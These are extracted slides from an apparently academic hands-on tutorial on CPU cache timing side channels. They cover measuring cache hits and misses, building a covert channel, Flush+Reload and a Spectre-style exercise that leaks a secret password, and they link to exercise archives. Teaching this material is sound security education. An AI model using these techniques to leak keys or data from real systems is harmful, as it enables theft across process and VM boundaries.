

# **Turning Timing Differences into Data Leakage**

Daniel Weber, Michael Schwarz December 6, 2022

CISPA Helmholtz Center for Information Security

Agenda





Mic-Sec 22: Turning Timing Differences into Data Leakage

Agenda







Stealthy Communication

Agenda







Stealthy Communication



Leaking Inaccessible Data

## **Exercise Requirements**





## Hardware/Software Requirements:

• x86 CPU

## **Exercise Requirements**





## Hardware/Software Requirements:

- x86 CPU
- Linux installation

## **Exercise Requirements**





## Hardware/Software Requirements:

- x86 CPU
- Linux installation
- Installed tools: python3, gcc, make
- Installed Python package: matplotlib

## **CPU Optimizations**





• Modern CPUs contain multiple microarchitectural elements

## **CPU Optimizations**





- Modern CPUs contain multiple microarchitectural elements
- Transparent for the programmer

## **CPU Optimizations**





- Modern CPUs contain multiple microarchitectural elements
- Transparent for the programmer
- **Optimize** for performance, power consumption, ...















Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage













Mic-Sec 22: Turning Timing Differences into Data Leakage



Does that really work?

Mic-Sec 22: Turning Timing Differences into Data Leakage



Does that really work? Can we **observe** these effects?

## **Experiment Idea**





### 1) Time cache hits

## **Experiment Idea**





- 1) Time cache hits
- 2) Time cache misses

## **Experiment Idea**





- 1) Time cache hits
- 2) Time cache misses
- 3) Plot the timings

What Building Blocks do we need?





• **BB 1**: Bring memory **into** the cache

Mic-Sec 22: Turning Timing Differences into Data Leakage

What Building Blocks do we need?





- **BB** 1: Bring memory **into** the cache
- BB 2: Remove memory from the cache

## What Building Blocks do we need?





- **BB** 1: Bring memory **into** the cache
- BB 2: Remove memory from the cache
- **BB 3**: High-precision time measurements

Mic-Sec 22: Turning Timing Differences into Data Leakage



How do we bring memory into the cache?

## **BB 1: Bring memory into the cache**





Mic-Sec 22: Turning Timing Differences into Data Leakage

## BB 1: Bring memory into the cache





#### Easy! Just access it



How do we remove memory from the cache?

## **BB2: Remove Memory from the Cache**





- Caches are limited in size
- $\rightarrow \mbox{ Access many other addresses }$
- $\rightarrow\,$  Original entry will be evicted

## **BB2: Remove Memory from the Cache**





- Caches are limited in size
- $\rightarrow \mbox{ Access many other addresses }$
- $\rightarrow\,$  Original entry will be evicted
- Special cache-maintenance instructions
- $\rightarrow$  CLFLUSH [rax] and CLFLUSHOPT [rax]



#### How do we get high-precision time measurements?

## **High-Precision Time Measurements**





• x86 has two instructions: rdtsc and rdtscp

## **High-Precision Time Measurements**





- x86 has two instructions: rdtsc and rdtscp
- Reads the processor's time-stamp counter
- $\rightarrow~{\rm CPU}$  cycles since reset

## **High-Precision Time Measurements**





- x86 has two instructions: rdtsc and rdtscp
- Reads the processor's time-stamp counter
- $\rightarrow~{\rm CPU}$  cycles since reset
- Highly accurate (nanoseconds), low overhead

#### **High-Precision Time Measurements**







What about out-of-order execution?

#### **Timings can be Reordered**



### $\textbf{Out-of-order execution} \rightarrow \text{different possibilities}$







• **Pseudo-serializing** instruction rdtscp (recent CPUs)





- **Pseudo-serializing** instruction rdtscp (recent CPUs)
- Serializing instructions like cpuid





- **Pseudo-serializing** instruction rdtscp (recent CPUs)
- Serializing instructions like cpuid
- Fences like mfence





- **Pseudo-serializing** instruction rdtscp (recent CPUs)
- Serializing instructions like cpuid
- Fences like mfence

Intel, How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures White Paper, December 2010.

## **BB3: High-Precision Time Measurements (Accurate)**







## We got **all building blocks!** Let's get our hands dirty!

**Exercise 1: Observing CPU Caches** 



#### The Task:



Build a histogram for cache hits and misses.

## **Exercise 1: Observing CPU Caches**





#### The Task:

Build a histogram for cache hits and misses.

#### Hints for better results:

- Connect your laptop to power
- Close unrelated programs



# Exercise 1: Observing CPU Caches

(https:///challenge.attacking.systems/cpu-caches.tar.gz)

### Mission Accomplished: Observing CPU Caches





Mic-Sec 22: Turning Timing Differences into Data Leakage



Can we do something with that?





Mic-Sec 22: Turning Timing Differences into Data Leakage











Mic-Sec 22: Turning Timing Differences into Data Leakage



Mic-Sec 22: Turning Timing Differences into Data Leakage







Mic-Sec 22: Turning Timing Differences into Data Leakage



• CPUs optimize recognizable access patterns



- CPUs optimize recognizable access patterns
- Pattern detected  $\rightarrow$  **prefetch next** addresses



- CPUs optimize recognizable access patterns
- Pattern detected  $\rightarrow$  **prefetch next** addresses

```
for (size_t i = 0; i < 10; i++) {
    // CPU will prefetch arr[i+1] -> Cache hits
    sum += arr[i];
}
```



- CPUs optimize recognizable access patterns
- Pattern detected  $\rightarrow$  **prefetch next** addresses

```
for (size_t i = 0; i < 10; i++) {
    // CPU will prefetch arr[i+1] -> Cache hits
    sum += arr[i];
}
```

 $\rightarrow$  **Permutate** your accesses!



- CPUs optimize recognizable access patterns
- Pattern detected  $\rightarrow$  prefetch next addresses

```
for (size_t i = 0; i < 10; i++) {
    // CPU will prefetch arr[i+1] -> Cache hits
    sum += arr[i];
}
```

- $\rightarrow$  **Permutate** your accesses!
- $\rightarrow$  Shift indices by 4096B



Let's try this out!

Mic-Sec 22: Turning Timing Differences into Data Leakage

#### **Exercise 2: Covert Communication**



#### The Task:

Build a covert communication channel using the CPU cache.



#### **Exercise 2: Covert Communication**



## The Task:



Build a covert communication channel using the CPU cache.

#### Hints for better results:

- Connect your laptop to power
- Close unrelated programs

#### **Exercise 2: Covert Communication**



## The Task:



Build a covert communication channel using the CPU cache.

#### Hints for better results:

- Connect your laptop to power
- Close unrelated programs
- Use permutate\_index function to prevent prefetch effects



# Exercise 2:

# **Stealthy Communication**

(https:///challenge.attacking.systems/covert.tar.gz)

## Mission Accomplished: Covert Communication via the CPU Cache



• Encoding data in the CPU cache

# Mission Accomplished: Covert Communication via the CPU Cache



- Encoding data in the CPU cache
- Decoding from another process

# Mission Accomplished: Covert Communication via the CPU Cache



- Encoding data in the CPU cache
- Decoding from another process
- $\rightarrow$  Stealthy Communication between 2 processes



What happens if the sending party is a benign process?





Step 1: Attacker maps shared library (shared memory, in cache)





Step 1: Attacker maps shared library (shared memory, in cache)





Step 1: Attacker maps shared library (shared memory, in cache)

Step 2: Attacker flushes the shared cache line





Step 1: Attacker maps shared library (shared memory, in cache)

Step 2: Attacker flushes the shared cache line

Step 3: Victim loads the data





Step 1: Attacker maps shared library (shared memory, in cache)

Step 2: Attacker flushes the shared cache line

Step 3: Victim loads the data

Step 4: Attacker measures the access time to reload the data





• Build covert communication channels





- Build covert communication channels
- Monitor function calls of other applications





- Build covert communication channels
- Monitor function calls of other applications
- Leak cryptographic keys





- Build covert communication channels
- Monitor function calls of other applications
- Leak cryptographic keys
- Leak information from **co-located virtual machines**
- . . .



Can we leak something else than meta data?



# Can we leak something else than meta data? Perhaps **real data?**



if x > \*min\_ptr









Mic-Sec 22: Turning Timing Differences into Data Leakage













Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage









Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage







Maybe transient execution leaves traces in the microarchitecture?



x = 42 x\_ptr = &x flush(x\_ptr) if x > \*min\_ptr



























































Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage





























Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage









Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage





Mic-Sec 22: Turning Timing Differences into Data Leakage













Mic-Sec 22: Turning Timing Differences into Data Leakage









Mic-Sec 22: Turning Timing Differences into Data Leakage

















Mic-Sec 22: Turning Timing Differences into Data Leakage











Let's leak some data!

Mic-Sec 22: Turning Timing Differences into Data Leakage

# **Exercise 3: When Predictions go Wrong**



#### The Task:

Leak the secret password by exploiting the victim API.



# **Exercise 3: When Predictions go Wrong**



### The Task:

Leak the secret password by exploiting the victim API.



#### Hints for better results:

- Connect your laptop to power
- Close unrelated programs
- Use permutate\_index function to prevent prefetch effects

# **Exercise 3: When Predictions go Wrong**



### The Task:

Leak the secret password by exploiting the victim API.



#### Hints for better results:

- Connect your laptop to power
- Close unrelated programs
- Use permutate\_index function to prevent prefetch effects
- Be patient!



# Exercise 3:

# When Predictions go Wrong

(https:///challenge.attacking.systems/spectre.tar.gz)

# Mission Accomplished: Leaking actual data





• Branch predictor mistrained

# Mission Accomplished: Leaking actual data





- Branch predictor mistrained
- Data encoded in CPU cache

## Mission Accomplished: Leaking actual data





- Branch predictor mistrained
- Data encoded in CPU cache
- $\rightarrow~$  Inaccessible data leaked through transient execution







#### **Observe Optimizations**

Mic-Sec 22: Daniel Weber (Yweber\_daniel), Michael Schwarz (Ymisc0110)

Recap





**Observe Optimizations** 



Leak Access Patterns (Meta Data)

Recap





**Observe Optimizations** 



Leak Access Patterns

(Meta Data)



Leaking Inaccessible Data

Recap









**Observe Optimizations** 

Leak Access Patterns (Meta Data) Leaking Inaccessible Data

#### CPU optimizations can lead to severe data leakage!

Mic-Sec 22: Daniel Weber (Yweber\_daniel), Michael Schwarz (Ymisc0110)



# **Turning Timing Differences into Data Leakage**

Daniel Weber, Michael Schwarz December 6, 2022

CISPA Helmholtz Center for Information Security

#### References





- Icons and Images from storyset.com and thenounproject.com
- Some Animations from Moritz Lipp